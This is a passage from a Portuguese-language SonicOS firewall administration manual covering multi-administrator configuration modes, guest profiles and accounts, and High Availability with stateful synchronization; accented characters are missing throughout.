ao grupo administrativo de nvel superior.

Para alternar do modo de no configurao para o modo de configurao completa, realize as
seguintes etapas:
Etapa 1 Navegue at a pgina Sistema > Administrao.

Etapa 2 Na seo Configuraes de gerenciamento da web, clique no boto Modo de
configurao. Se no houver atualmente um administrador no modo de configurao, voc
ser automaticamente inserido no modo de configurao.
Etapa 3 Se outro administrador estiver no modo de configurao, a seguinte mensagem ser exibida.
Etapa 4 Clique no boto Continuar para entrar no modo de configurao. O administrador atual
convertido para o modo somente leitura e voc obter acesso de administrador completo.
Verificando a configurao do Suporte para mltiplos administradores

As contas de usurio com administrador e administradores somente leitura podem ser exibidas
na pgina Usurios > Grupos locais .
Os administradores podem determinar em qual modo de configurao eles esto, visualizando

o canto superior direito da interface de gerenciamento ou a barra de status de seu navegador.
Para exibir a barra de status no Firefox e no Internet Explorer, clique no menu Exibir e habilite
a Barra de status. Por padro, o Internet Explorer 7.0 e o Firefox 2.0 no permitem a exibio
de texto nas pginas da web na barra de status. Para permitir mensagens na barra de status

no Internet Explorer, v at Ferramentas > Opes de Internet, selecione a guia Segurana
, clique no boto Nvel personalizado, role at o final da lista e selecione Habilitar para
Permitir atualizaes na barra de status por meio de script.
Para permitir mensagens na barra de status no Firefox, v at Ferramentas > Opes,
selecione a guia Contedo, clique no boto Avanado e, em seguida, selecione a caixa de
seleo Alterar texto da barra de status na janela pop-up que exibida.
Quando o administrador est no modo de configurao completa, nenhuma mensagem
exibida no canto superior direito e a barra de status Concludo exibida.
Quando o administrador est no modo somente leitura, a mensagem Modo somente leitura
exibida no canto superior direito da interface.
A barra de status exibe Modo somente leitura no possvel fazer nenhuma alterao.
Quando o administrador est no modo de no configurao, a mensagem Modo de no

configurao exibida no canto superior direito da interface. Clique nos links de texto para a
pgina Sistema > Administrao, onde possvel inserir o modo de configurao completa.
A barra de status exibe Modo de no configurao no permitido fazer nenhuma
alterao.
Exibindo mensagens de log relacionadas a mltiplos administradores

As mensagens de log so geradas para os seguintes eventos:
Um usurio da GUI ou CLI inicia o modo de configurao (incluindo os casos em que um
administrador efetua login).
Um usurio da GUI ou CLI encerra o modo de configurao (incluindo os casos em que um
administrador efetua logout).
Um usurio da GUI inicia o gerenciamento no modo de no configurao (incluindo os
casos em que um administrador efetua login e os casos em que um usurio no modo de
configurao apropriado e descartado, retornando para o modo somente leitura).
Um usurio da GUI inicia o gerenciamento no modo somente leitura.
Um usurio da GUI encerra uma das sesses de gerenciamento acima (incluindo o logout de
um administrador).

Captulo 60
Gerenciando servios para convidados
e contas de convidados
Usurios > Servios de convidados

As contas de convidados so contas temporrias configuradas para que os usurios faam
logon na rede. possvel criar essas contas manualmente, conforme o necessrio ou ger-las
em lotes. O SonicOS inclui perfis que podem ser configurados antecipadamente para
automatizar a configurao de contas de convidados ao ger-las. Geralmente, as contas de
convidados so limitadas a um perodo de vida predeterminado. Aps seu perodo de vida, por
padro, as contas so removidas.
Os servios para convidados determinam os limites e a configurao das contas de convidado.
A pgina Usurios > Servios para convidados exibe uma lista de Perfis de convidados. Os
perfis de convidados determinaro a configurao de contas de convidados ao serem gerados.
Na pgina Usurios > Servios para convidados, possvel adicionar, excluir e configurar
os Perfis de convidados. Alm disso, ser possvel determinar se todos os usurios que
efetuarem login no dispositivo de segurana vero uma janela de login de usurio que exibe a
quantidade de tempo restante na sesso de login atual.
Gerenciando servios para convidados e contas de convidados | 1075

Configuraes de convidados globais
Verifique Mostrar janela de status de login do convidado com boto de logout para exibir
uma janela de login de usurio na estao de trabalho dos usurios sempre que o usurio
estiver com o login efetuado. Os usurios devem manter esta janela aberta durante sua sesso
de login. A janela exibe o tempo restante na sua sesso atual. Os usurios podem efetuar
logout, clicando no boto Efetuar logout na janela de status de login.
Perfis de convidados
A lista Perfis de convidados mostra os perfis criados e permite adicionar, editar e excluir perfis.
Para adicionar um perfil:
Etapa 1 Clique em Adicionar abaixo da lista Perfil de convidado para exibir a janela Adicionar perfil de
convidado.
Etapa 2 Na janela Adicionar perfil de convidado, configure:

Nome do perfil: Insira o nome do perfil.
Prefixo de nome de usurio: Insira a primeira parte de todos os nomes de conta de
usurios gerados a partir deste perfil.
Gerar nome de usurio automaticamente: Selecione essa opo para permitir que
as contas de convidados geradas a partir deste perfil possuam uma nome de usurio
gerado automaticamente. Normalmente, o nome de usurio o prefixo mais um
nmero de dois ou trs dgitos.
Gerar senha automaticamente: Selecione essa opo para permitir que as contas de
convidados geradas a partir deste perfil possuam uma senha gerada automaticamente.
A senha gerada uma cadeia alfabtica exclusiva de oito caracteres.
Habilitar conta: Selecione essa opo para que todas as contas de convidados
geradas a partir deste perfil sejam habilitadas na criao.
Expurgar conta automaticamente: Selecione essa opo para remover a conta do
banco de dados aps sua durao de vida ter expirado.

Impor exclusividade de login: Selecione essa opo para permitir que apenas uma
nica instncia de uma conta seja usada em um determinado momento. Por padro,
esse recurso habilitado ao criar uma nova conta de convidado. Se voc desejar
permitir que vrios usurios efetuem login com uma nica conta, desabilite essa
imposio desmarcando a caixa de seleo Impor exclusividade de login.
Ativar conta no primeiro login: Marcar esta caixa atrasa o timer Expirao da conta
at que um usurio efetue login na conta pela primeira vez.
Durao de vida da conta: Essa configurao define por quanto tempo uma conta
permanece no dispositivo de segurana antes da conta expirar. Se Expurgar
automaticamente estiver habilitado, a conta ser excluda ao expirar. Se a caixa de
seleo Expurgar automaticamente for desmarcada, a conta permanecer na lista de
contas de convidados com um status Expirado, permitindo a fcil reativao.
Durao de vida da sesso: Define por quanto tempo uma sesso de login de
convidado permanecer ativa aps ter sido ativada. Por padro, a ativao ocorre na
primeira vez que um usurio convidado efetuar logon em uma conta. A Durao de
vida da sesso no pode exceder o valor definido na Durao de vida da conta.
Tempo limite inativo: Define o perodo mximo de tempo quando nenhum trfego for
passado em uma sesso ativada de servios de convidados. Exceder o perodo
definido por essa configurao expirar a sesso, mas a prpria conta permanecer
ativa enquanto a Durao de vida da conta no tiver expirado. O Tempo limite
inativo no pode exceder o valor definido na Durao de vida da sesso.
Comentrio: Qualquer texto pode ser inserido como um comentrio no campo
Comentrio.
Etapa 3 Clique em OK para adicionar o perfil.
Usurios > Contas de convidados

A pgina Usurios > Contas de convidados lista as contas de servios de convidados do
dispositivo de segurana. Nas contas de servios de convidados, possvel habilitar ou
desabilitar contas individuais, grupos de contas ou todas as contas, possvel definir o recurso
Expurgar automaticamente para contas e possvel adicionar, editar, excluir e imprimir contas.

Exibindo estatsticas de conta de convidado
Para exibir estatsticas em uma conta de convidado, passe seu mouse sobre o cone
Estatsticas na linha da conta de convidado. A janela de estatsticas exibir o total cumulativo
de bytes e pacotes enviados e recebidos em todas as sesses concludas. As sesses ativas
atualmente no sero adicionadas s estatsticas at que o usurio convidado efetue logout.
Adicionando contas de convidados

possvel adicionar contas de convidados individualmente ou gerar vrias contas de
convidados automaticamente.
Para adicionar uma conta individual:
Etapa 1 Na lista de contas, clique em Adicionar convidado.
Etapa 2 Na guia Configuraes da janela Adicionar conta de convidado configure:

Perfil: Selecione o Perfil de convidado a partir do qual gerar esta conta.
Nome: Insira um nome para a conta ou clique em Gerar. O nome gerado o prefixo
no perfil e um nmero aleatrio de dois ou trs dgitos .
Comentrio: Insira um comentrio descritivo.
Senha: Insira a senha da conta do usurio ou clique em Gerar. A senha gerada uma
cadeia de caracteres aleatrios de oito caracteres alfabticos.

Confirmar senha: Se no gerou a senha, insira-a novamente.
Nota Anote a senha. Caso contrrio, ter que redefini-la.
Etapa 3 Na guia Servios para convidados, configure:

Habilitar privilgio de servios para convidados: Selecione essa opo para a
conta a ser habilitada na criao.
instncia dessa conta efetue login do dispositivo de segurana de uma vez. Deixe-a
desmarcada para permitir que vrios usurios usem esta conta uma vez.
Expurgar a conta automaticamente na expirao da conta: Selecione essa opo
para remover a conta do banco de dados aps sua durao de vida ter expirado.
Ativar conta no primeiro login: Selecione essa opo para iniciar o tempo para a
expirao de conta.
A conta expira: Essa configurao define por quanto tempo uma conta permanece no
dispositivo de segurana antes da conta expirar. Se Expurgar a conta
automaticamente na expirao da conta estiver habilitada, a conta ser excluda ao
expirar. Se a caixa de seleo Expurgar a conta automaticamente na expirao da
conta for desmarcada, a conta permanecer na lista de contas de convidados com um
status Expirado, permitindo a fcil reativao. Essa configurao substitui a
configurao de durao de vida da conta no perfil.
vida da sesso no pode exceder o valor definido na Durao de vida da conta. Essa
configurao substitui a configurao de durao de vida da sesso no perfil.
inativo no pode exceder o valor definido na Durao de vida da sesso. Essa
configurao substitui a configurao de tempo limite inativo no perfil.
Etapa 4 Clique em OK para gerar a conta.

Para Gerar vrias contas
Etapa 1 Na lista de contas, clique em Gerar.
Etapa 2 Na guia Configuraes da janela Gerar contas de convidados configure:

Perfil: Selecione o Perfil de convidado a partir do qual gerar as contas.
Nmero de contas: Insira o nmero de contas a serem geradas.
Prefixo de nome de usurio: Insira o prefixo a partir do qual os nomes da conta so
gerados. Por exemplo, se voc inserir Convidado, as contas geradas tero nomes
como "Convidado 123" e "Convidado 234".
Comentrio: Insira um comentrio descritivo.
Etapa 3 Na guia Servios para convidados, configure:
Habilitar privilgio de servios para convidados: Selecione essa opo para as
contas a serem ativadas na criao.
instncia de cada conta gerada efetue login do dispositivo de segurana de uma vez.
Deixe-a desmarcada para permitir que vrios usurios usem esta conta uma vez.
Expurgar a conta automaticamente na expirao da conta: Selecione essa opo
para remover a conta do banco de dados aps sua durao de vida ter expirado. Essa
configurao substituir a configurao Expurgar automaticamente no perfil de
convidado, se elas se diferenciarem.
A conta expira: Essa configurao define por quanto tempo uma conta permanece no
dispositivo de segurana antes da conta expirar. Se Expurgar automaticamente
estiver habilitada, a conta ser excluda ao expirar. Se a caixa de seleo Expurgar
automaticamente for desmarcada, a conta permanecer na lista de contas de
convidados com um status Expirado, permitindo a fcil reativao. Essa configurao
substitui a conta e expira a configurao no perfil.

vida da sesso no pode exceder o valor definido na Durao de vida da conta. Essa
configurao substitui a configurao de durao de vida da sesso no perfil.
inativo no pode exceder o valor definido na Durao de vida da sesso. Essa
configurao substitui a configurao de tempo limite inativo no perfil.
Etapa 4 Clique em OK para gerar as contas.
Habilitando contas de convidados

possvel habilitar ou desabilitar qualquer nmero de contas de uma vez. Para habilitar uma
ou mais contas de convidados:
Etapa 1 Marque a caixa de seleo na coluna Habilitar prxima ao nome da conta que deseja habilitar.
Selecione a caixa Habilitar no cabealho da tabela para habilitar todas as contas na pgina.
Etapa 2 Clique em Aceitar na parte superior da pgina.
Habilitando Expurgar automaticamente para contas de convidados

possvel habilitar ou desabilitar Expurgar automaticamente para vrias contas de uma vez.
Quando Expurgar automaticamente estiver habilitado, a conta ser excluda ao expirar. Para
habilitar Expurgar automaticamente:
Etapa 1 Selecione a caixa na coluna Expurgar automaticamente prxima ao nome da conta.

Selecione a caixa Expurgar automaticamente no cabealho da tabela para habilit-la em
todas as contas na pgina.
Etapa 2 Clique em Aceitar na parte superior da pgina.

Imprimindo detalhes da conta
possvel imprimir um resumo de uma conta de convidado. Clique no cone de impresso
para lanar uma pgina de relatrio de resumo de conta e enviar essa pgina a uma
impressora ativa.
Usurios > Status de convidados

A pgina Status de convidados relata sobre todas as contas de convidados atualmente
conectados ao dispositivo de segurana.
A pgina lista:
Nome: O nome da conta de convidado.
IP: O endereo IP ao qual o usurio convidado est conectado.
Interface: A interface no dispositivo de segurana atravs da qual a conta de usurio est
se conectando ao dispositivo. Por exemplo, se a conta de convidado for um usurio sem
fio se conectando por meio de um SonicWALL SonicPoint e, todos os SonicPoints
estiverem se conectando porta X3 no dispositivo, que est configurada como uma zona
sem fio, a coluna Interface listar X3.
Zona: A zona do dispositivo de segurana qual o usurio convidado est se conectando.
Por exemplo, um usurio sem fio pode estar se conectando zona WLAN.
Expirao da conta: A data, hora ou minuto em que a conta expira.
Expirao da sesso: A hora em que a sesso atual expira.
Estatsticas: passe o mouse sobre o cone Estatsticas para exibir estatsticas para o total
de bytes e pacotes recebidos e enviados para a sesso atual desse usurio convidado.

Logout: Clique no cone Efetuar logout para registrar o usurio convidado fora do
dispositivo de segurana.
Clique em Atualizar na parte superior da pgina a qualquer momento para atualizar as
informaes na lista.
Marque as caixas de seleo para usurios convidados e, em seguida, clique no boto Efetuar
logout para desconect-los.
Efetuando login nas contas fora do dispositivo

Como administrador, possvel registrar usurios fora do dispositivo de segurana:
Para efetuar logout de um usurio individual, clique no cone Efetuar logout na coluna
Efetuar logout para esse usurio.
Para efetuar logout de vrios usurios, clique na caixa de seleo na primeira coluna para
selecionar os usurios individuais ou marque a caixa de seleo prxima ao n no
cabealho de tabela para selecionar todos os usurios convidados listados na pgina. Em
seguida, clique em Efetuar logout abaixo da lista.

Parte 17
| 1085
Captulo 61
Configurar a Alta disponibilidade
A Alta disponibilidade (AD) permite que dois firewalls idnticos executando o SonicOS sejam
configurados para fornecer uma conexo confivel e contnua Internet pblica. Esta seo
fornece informaes conceituais e descreve como configurar a Alta disponibilidade (AD) no
SonicOS. Esta seo contm as seguintes subsees:
Viso geral da Alta disponibilidade na pgina 1087
Viso geral da Sincronizao estvel na pgina 1093
Viso geral de AD de DPI ativa/ativa na pgina 1095
Pr-requisitos de DPI ativa/em espera e ativa/ativa na pgina 1095
Alta disponibilidade > Status na pgina 1101
Alta disponibilidade > Configuraes na pgina 1104
Alta disponibilidade > Avanado na pgina 1109
Alta disponibilidade > Monitoramento na pgina 1111
Clustering ativo/ativo na pgina 1114
Viso geral da Alta disponibilidade

As sees a seguir fornecem vises gerais de implementao de AD da Dell SonicWALL:
Modos de Alta disponibilidade na pgina 1088
Viso geral de AD ativa/em espera na pgina 1092
Benefcios de AD ativa/em espera na pgina 1092
Como funciona a AD ativa/em espera? na pgina 1092
Endereo MAC virtual na pgina 1090
Sobre o monitoramento de AD na pgina 1091
Viso geral da Sincronizao estvel na pgina 1093
Benefcios da Sincronizao estvel na pgina 1093
Como funciona a Sincronizao estvel? na pgina 1093
Viso geral de AD de DPI ativa/ativa na pgina 1095
Configurar a Alta disponibilidade | 1087

Benefcios de AD de DPI ativa/ativa na pgina 1095
Pr-requisitos de DPI ativa/em espera e ativa/ativa na pgina 1095
Plataformas com suporte para AD na pgina 1095
Conectando fisicamente seus dispositivos na pgina 1096
Registrar e associar dispositivos no MySonicWALL na pgina 1097
Licenciar recursos de alta disponibilidade na pgina 1098
Modos de Alta disponibilidade

A Alta disponibilidade tem quatro modos de operao.
Ativo/em espera
DPI ativa/ativa
Clustering ativo/ativo
Clustering de DPI ativa/ativa
Os quatro modos de operao de AD podem ser selecionados na pgina
Alta disponibilidade > Configuraes, na guia Geral, no menu suspenso:
Ativo/em espera o modo Ativo/em espera fornece alta disponibilidade bsica com a
configurao de dois firewalls idnticos como um par de Alta disponibilidade. A unidade Ativa
manipula todo o trfego, enquanto a unidade Em espera compartilha suas configuraes e
pode assumir a qualquer momento para fornecer conectividade contnua de rede se a unidade
Ativa parar de funcionar. Por padro, o modo Ativo/em espera no tem estado, o que significa
que as conexes de rede e os tneis de VPN devem ser novamente estabelecidos aps um
failover. Para evitar isso, a Sincronizao estvel pode ser licenciada e habilitada com o modo
Ativo/em espera. Nesse modo de AD estvel, o estado dinmico continuamente sincronizado

entre as unidades Ativa e Em espera. Quando a unidade Ativa encontra uma condio de falha,
ocorre o failover estvel medida que o firewall Em espera assume a funo de Ativo sem
interrupes para as conexes de rede existentes.
Nota A AD com monitoramento de estado suportada apenas no NSA 2600 com a compra de
uma Licena Expandida ou uma Licena de Alta Disponibilidade do SonicOS. As licenas
podem ser adquiridas em www.mysonicwall.com.
DPI ativa/ativa O modo DPI (Deep Packet Inspection Inspeo profunda de pacotes) ativa/
ativa pode ser usado com o modo Ativo/em espera. Quando o modo DPI ativa/ativa estiver
habilitado, os servios de DPI intensivos do processador, como Preveno de intruso (IPS),
Antivrus do gateway (GAV) e Anti-spyware, so processados no firewall de espera, enquanto
outros servios, como o firewall, NAT e outros tipos de trfego, so processados no firewall
Ativo simultaneamente.
Nota A DPI ativa/ativa no suportada no NSA 2600, NSA 3600 ou NSA 4600.
Clustering ativo/ativo nesse modo, vrios firewalls so agrupados como ns de cluster, com
vrias unidades Ativas processando trfego (como vrios gateways), fazendo DPI e
compartilhando a carga de rede. Cada n de cluster consiste em duas unidades atuando como
um par de AD estvel. O modo Clustering ativo/ativo fornece suporte de Failover estvel alm
de compartilhamento de carga. Opcionalmente, cada n de cluster pode tambm consistir em
uma nica unidade, caso em que os modos Failover estvel e DPI ativa/ativa no esto
disponveis.
Nota O modo Clustering ativo/ativo suportado por padro na srie SM 9000. O modo Clustering
ativo/ativo compatvel com o NSA 5600 e NSA 6600 somente com a aquisio de uma
licena expandida do SonicOS. As licenas podem ser adquiridas em
www.mysonicwall.com.
Clustering de DPI ativa/ativa este modo permite a configurao de at quatro ns de cluster

de AD de failover e compartilhamento de carga, em que a carga dos ns balanceia a aplicao
de servios de segurana de DPI para trfego de rede. Esse modo pode ser habilitado para
ganho de desempenho adicional, utilizando as unidades em espera em cada n de cluster.
Terminologia de AD
Primria descreve a unidade principal de hardware. O identificador "Primria" uma
designao manual e no est sujeito a alteraes condicionais. Em condies
operacionais normais, a unidade de hardware Primria opera em uma funo de Ativo.
Secundria descreve a unidade de hardware subordinada. O identificador "Secundria"
uma designao relacional e assumido por uma unidade quando combinado com uma
unidade Primria. Em condies operacionais normais, a unidade Secundria opera no
modo Em espera. Aps a falha da unidade Primria, a unidade Secundria assumir a
funo de Ativo.
Ativo descreve a condio operacional de uma unidade de hardware. O identificador
"Ativo" uma funo lgica que pode ser assumida por uma unidade de hardware Primria
ou Secundria.
Em espera descreve a condio passiva de uma unidade de hardware. O identificador
Em espera uma funo lgica que pode ser assumida por uma unidade de hardware
Primria ou Secundria. A unidade Em espera assume a funo Ativa no caso de falha
determinvel da unidade Ativa.

Failover descreve o processo atual no qual a unidade de Em espera assume a funo
Ativa aps uma falha qualificada da unidade Ativa. A qualificao de falha obtida atravs
de vrios recursos de monitoramento fsicos e lgicos configurveis descritos na seo
Lista de tarefas.
Preempo aplica-se a uma condio ps-failover em que a unidade Primria falhou e
a unidade Secundria assumiu a funo Ativa. A habilitao de Preempo far com que
a unidade Primria aproveite a funo Ativa da Secundria aps a Primria ser restaurada
para um estado operacional verificado.
Deteco de falhas
O recurso de AD tem um mecanismo completo de autodiagnstico para os firewalls Ativo e Em
espera. O failover na unidade em espera ocorre quando os servios essenciais so afetados,
a falha de link fsico (ou lgico) detectada em interfaces monitoradas ou quando o
SonicWALL perde a alimentao.
O mecanismo de verificao automtica gerenciado por diagnstico de software, o qual
verifica a integridade do sistema completo do dispositivo SonicWALL. O diagnstico verifica o
status do sistema interno, o status de processo do sistema e a conectividade de rede. H um
mecanismo de ponderao nos dois lados para decidir qual lado tem melhor conectividade,
usado para evitar possveis loops de failover.
Os processos de sistema interno essenciais, como NAT, VPN e DHCP (entre outros) so
verificados em tempo real. O servio com falha isolado o mais cedo possvel e o mecanismo
de failover repara-o automaticamente.
Endereo MAC virtual

O Endereo MAC virtual permite que o par de Alta disponibilidade compartilhe o mesmo
endereo MAC, o que reduz drasticamente o tempo de convergncia aps um failover. O
tempo de convergncia a quantidade de tempo que os dispositivos em uma rede demoram
a adaptar suas tabelas de roteamento s alteraes introduzidas por alta disponibilidade.
Sem o MAC virtual habilitado, cada dispositivo Ativo e Em espera tem seus prprios endereos
MAC. Como os dispositivos esto usando o mesmo endereo IP, quando ocorre um failover o
mapeamento quebrado entre o endereo IP e o endereo MAC no cache de ARP de todos
os clientes e recursos de rede. O dispositivo Secundrio deve emitir uma solicitao ARP,
anunciando o novo par de Endereo MAC/Endereo IP. At essa solicitao ARP se propagar
atravs da rede, o trfego destinado ao endereo MAC do dispositivo Primrio pode ser
perdido.
O endereo MAC virtual simplifica consideravelmente esse processo usando o mesmo
endereo MAC para os dispositivos Primrio e Secundrio. Quando ocorre um failover, todas
as rotas para e do dispositivo Primrio ainda so vlidas para o dispositivo Secundrio. Todos
os clientes e sites remotos continuam a usar o mesmo endereo MAC virtual e o endereo IP
sem interrupes.
Por padro, esse endereo MAC virtual fornecido pelo firmware SonicWALL e diferente do
endereo MAC fsico de dispositivos Primrios ou Secundrios. Isso elimina a possibilidade de
erros de configurao e garante a exclusividade do endereo MAC virtual, o que impede
possveis conflitos. Como alternativa, voc pode configurar manualmente o endereo MAC
virtual na pgina Alta disponibilidade > Monitoramento.
A configurao de MAC virtual est disponvel mesmo que a Alta disponibilidade estvel no
esteja licenciada. Quando o MAC virtual estiver habilitado, ele sempre usado mesmo se a
Sincronizao estvel no estiver habilitada.

Sobre o monitoramento de AD
Na pgina Alta disponibilidade > Monitoramento, voc pode configurar o monitoramento de
interface fsica e lgica. Habilitando o monitoramento de interface fsica, voc habilita a
deteco de link para as interfaces de AD designadas. O link detectado na camada fsica
para determinar a viabilidade do link. O monitoramento lgico envolve a configurao do
SonicWALL para monitorar um dispositivo confivel em uma ou mais redes conectadas. A falha
de comunicao peridica com o dispositivo pela unidade Ativa no par de AD disparar um
failover na unidade Em espera. Se nenhuma unidade no par de AD conseguir conectar-se ao
dispositivo, nenhuma ao ser executada.
Os endereos IP Primrio e Secundrio configurados na pgina Alta disponibilidade >
Monitoramento podem ser configurados em interfaces de LAN ou WAN e so usados para
diversos fins:
Como endereos de gerenciamento independentes para cada unidade (suportados em
todas as interfaces fsicas)
Para permitir a sincronizao de licenas entre a unidade Em espera e o servidor de
licenciamento SonicWALL
Como endereos IP de origem para os pings de investigao enviados durante o
monitoramento lgico
A configurao de endereos IP de gerenciamento exclusivos para as duas unidades no par
de AD permite que voc efetue logon em cada unidade de forma independente para fins de
gerenciamento. Observe que o trfego de no gerenciamento ignorado se for enviado para
um desses endereos IP. Os endereos IP da LAN exclusivos dos firewalls Primrio e
Secundrio no podem atuar como um gateway ativo; todos os sistemas conectados LAN
interna precisaro usar o endereo IP de LAN virtual como gateway.
Se os endereos IP de monitoramento da WAN estiverem configurados, os endereos IP de
monitoramento X0 no so necessrios. Se os endereos IP de monitoramento de WAN no
estiverem configurados, so necessrios os endereos IP de monitoramento X0, uma vez que,
em tal cenrio, a unidade de Em espera usa o endereo IP de monitoramento X0 para se
conectar ao servidor de licenciamento com todo o trfego roteado atravs de unidade Ativa.
O endereo IP de gerenciamento da unidade Secundria/Em espera usado para permitir a
sincronizao de licena com o servidor de licenciamento do Dell SonicWALL que lida com
licenciamento em uma base por dispositivo (no por par de AD). Mesmo se a unidade
Secundria j tiver sido registrada em MySonicWALL antes de criar a associao de AD, voc
deve usar o link na pgina Sistema > Licenas para se conectar ao servidor Dell SonicWALL
ao acessar o dispositivo Secundrio por meio de seu endereo IP de gerenciamento.
Ao usar o monitoramento lgico, o par de AD executar ping ao destino especificado do
endereo IP de investigao lgico a partir da unidade Primria e tambm da unidade
Secundria. O endereo IP definido no campo Endereo IP primrio ou Endereo IP
secundrio usado como o endereo IP de origem para o ping. Se as duas unidades
conseguirem efetuar ping com xito ao destino, no ocorrer failover. Se no conseguirem
efetuar ping com xito ao destino, no ocorrer failover, pois o SonicOS assumir que o
problema est relacionado com o destino e no com os dispositivos. Se um dispositivo
conseguir efetuar ping ao destino, mas o outro no conseguir, ocorrer failover do par de AD
na unidade que consegue efetuar ping ao destino.
As tarefas de configurao na pgina Alta disponibilidade > Monitoramento so realizadas
na unidade Primria e, em seguida, so sincronizadas automaticamente para a Secundria.

Viso geral de AD ativa/em espera
A AD permite que dois firewalls idnticos executados no SonicOS sejam configurados para
fornecer uma conexo confivel e contnua Internet pblica. Um firewall configurado como
a unidade Primria e um firewall idntico configurado como a unidade Secundria. No caso
de falha do firewall Primrio, o firewall Secundrio assume para proteger uma conexo
confivel entre a rede protegida e a Internet. Os dois dispositivos configurados desta forma
tambm so conhecidos como um Par de alta disponibilidade (Par de AD).
A AD permite compartilhar licenas entre dois firewalls quando um est atuando como um
sistema de alta disponibilidade para o outro. Para usar este recurso, voc deve registrar os
dispositivos em MySonicWALL como produtos associados. Os dois dispositivos devem ser do
mesmo modelo SonicWALL.
Benefcios de AD ativa/em espera

A AD ativa/em espera fornece os seguintes benefcios:
Maior confiabilidade da rede em uma configurao de alta disponibilidade, o dispositivo
Secundrio assume todas as responsabilidades de rede quando a unidade Primria falha,
garantindo uma conexo confivel entre a rede protegida e a Internet.
Rentabilidade a alta disponibilidade uma opo rentvel para implementaes que
fornecem alta disponibilidade utilizando firewalls redundantes. Voc no precisa comprar
um segundo conjunto de licenas para a unidade Secundria em um Par de alta
disponibilidade.
MAC virtual para tempo de convergncia reduzido aps failover a configurao de
endereo MAC virtual permite que o par de AD compartilhe o mesmo endereo MAC, o que
reduz drasticamente o tempo de convergncia aps um failover. O tempo de convergncia
a quantidade de tempo que os dispositivos em uma rede demoram a adaptar suas
tabelas de roteamento s alteraes introduzidas por alta disponibilidade. Por padro, o
endereo MAC virtual fornecido pelo firmware SonicWALL e diferente do endereo
MAC fsico de dispositivos Primrios ou Secundrios.
Como funciona a AD ativa/em espera?

A AD requer um dispositivo SonicWALL configurado como o SonicWALL Primrio e um
dispositivo SonicWALL idntico configurado como o SonicWALL Secundrio. Durante a
operao normal, o SonicWALL Primrio est em um estado Ativo e o SonicWALL Secundrio
em um estado Em espera. Se o dispositivo Primrio perder a conectividade, o SonicWALL
Secundrio faz a transio para o modo Ativo e assume a configurao e a funo de Primrio,
incluindo os endereos IP de interface das interfaces configuradas.
A AD bsica ativa/em espera fornece alta disponibilidade sem estado. Aps um failover no
dispositivo Secundrio, todas as conexes de rede previamente existentes devem ser
restabelecidas, incluindo os tneis de VPN que devem ser negociados novamente. A
sincronizao estvel pode ser licenciada e habilitada separadamente. Para obter mais
informaes, consulte Viso geral da Sincronizao estvel na pgina 1093.
O failover se aplica a perda de funcionalidade ou conectividade de camada de rede no
SonicWALL Primrio. O failover no SonicWALL Secundrio ocorre quando os servios
essenciais so afetados, a falha de link fsico (ou lgico) detectada em interfaces
monitoradas ou quando o SonicWALL Primrio perde a alimentao. Os dispositivos
SonicWALL Primrio e Secundrio atualmente s so capazes de realizar Alta disponibilidade
ativa/em espera ou DPI ativa/ativa no h suporte para Alta disponibilidade ativa/ativa no
momento.

Existem dois tipos de sincronizao de configuraes para todas as definies de
configurao: incremental e completa. Se os carimbos de data/hora estiverem sincronizados e
for realizada uma alterao na unidade Ativa, uma sincronizao incremental enviada para
a unidade Em espera. Se os carimbos de data/hora no estiverem sincronizados e a unidade
Em espera estiver disponvel, uma sincronizao completa ser enviada para a unidade Em
espera. Quando a sincronizao incremental falhar, automaticamente tentada uma
sincronizao completa.
Viso geral da Sincronizao estvel

Esta seo fornece uma apresentao do recurso Sincronizao estvel. A Sincronizao
estvel oferece desempenho de failover drasticamente aprimorado. Quando habilitada, as
informaes de conexes de rede e tnel de VPN so continuamente sincronizadas entre as
duas unidades para que o dispositivo Secundrio consiga perfeitamente assumir todas as
responsabilidades de rede se o dispositivo Primrio falhar, sem interrupes de conexes de
rede existentes.
Benefcios da Sincronizao estvel na pgina 1093
Como funciona a Sincronizao estvel? na pgina 1093
Benefcios da Sincronizao estvel

A Sincronizao estvel fornece os seguintes benefcios:
Melhor confiabilidade sincronizando informaes de conexo de rede mais
importantes, a Sincronizao estvel impede tempo de inatividade e conexes
descartadas em caso de falha do dispositivo.
Desempenho de failover mais rpido mantendo uma sincronizao contnua entre os
dispositivos Primrio e Secundrio, a Sincronizao estvel habilita o dispositivo
Secundrio para assumir a sua funo em caso de falha sem praticamente tempo de
inatividade ou perda de conexes de rede.
Impacto mnimo no desempenho da CPU normalmente menos de 1% de uso.
Impacto mnimo na largura de banda a transmisso de dados de sincronizao
estrangulada para no interferir com outros dados.
Como funciona a Sincronizao estvel?

Sincronizao estvel no significa balanceamento de carga. uma configurao ativa/em
espera em que o dispositivo Primrio manipula todo o trfego. Quando a Sincronizao estvel
est habilitada, o dispositivo Primrio ativamente se comunica com o Secundrio para atualizar
a maioria das informaes de conexo de rede. Como o dispositivo Primrio cria e atualiza
informaes de conexo de rede (tneis de VPN, usurios ativos, entradas de cache de
conexo, etc.), ele informa o dispositivo Secundrio imediatamente. Isso garante que o
dispositivo Secundrio sempre esteja pronto para fazer a transio para o estado Ativo sem
descartar nenhuma conexo.
O trfego de sincronizao estrangulado para garantir que ele no interfere com o trfego de
rede normal. Todas as alteraes de configurao so executadas no dispositivo Primrio e
propagadas automaticamente para o dispositivo Secundrio. O par de alta disponibilidade usa
os mesmos endereos IP de LAN e WAN, independentemente do dispositivo que se encontra
Ativo no momento.

Ao usar o SonicWALL Global Management System (GMS) para gerenciar os dispositivos, o
GMS realiza o registro no endereo IP de WAN compartilhado. No caso de um failover, a
administrao do GMS continua sem interrupes e os administradores do GMS conectados
ao dispositivo no momento no sero desconectado. Porm, os comandos Get e Post podem
resultar em um tempo limite sem retorno de resposta.
A tabela a seguir lista as informaes que esto sincronizadas e que no esto sincronizadas
no momento pela Sincronizao estvel.
Informaes sincronizadas Informaes no sincronizadas

Informaes de VPN Clientes de WAN dinmico (L2TP, PPPoE e PPTP)
Cache de conexo bsica Inspeo profunda de pacotes (GAV, IPS e Anti Spyware)
FTP Ligaes IPHelper (como NetBIOS e DHCP)
Oracle SQL*NET Informaes sobre proteo SYNFlood
Real Audio Informaes de Content Filtering Service
RTSP Protocolos VoIP
Informaes de GVC Entradas ARP dinmicas e tempos limite de cache de ARP
Objetos de endereos dinmicos Informaes de cliente sem fio ativo
Informaes de servidor DHCP estatsticas de pacote de cliente sem fio
Multicast e IGMP Lista de pontos de acesso invasores
Usurios ativos
ARP
Status do SonicPoint
Status de convidados sem fio
Informaes de licena
Informaes de balanceamento de carga
ponderadas
Informaes de RIP e OSPF
Exemplo de Sincronizao estvel

No caso de um failover, ocorre a seguinte sequncia de eventos:
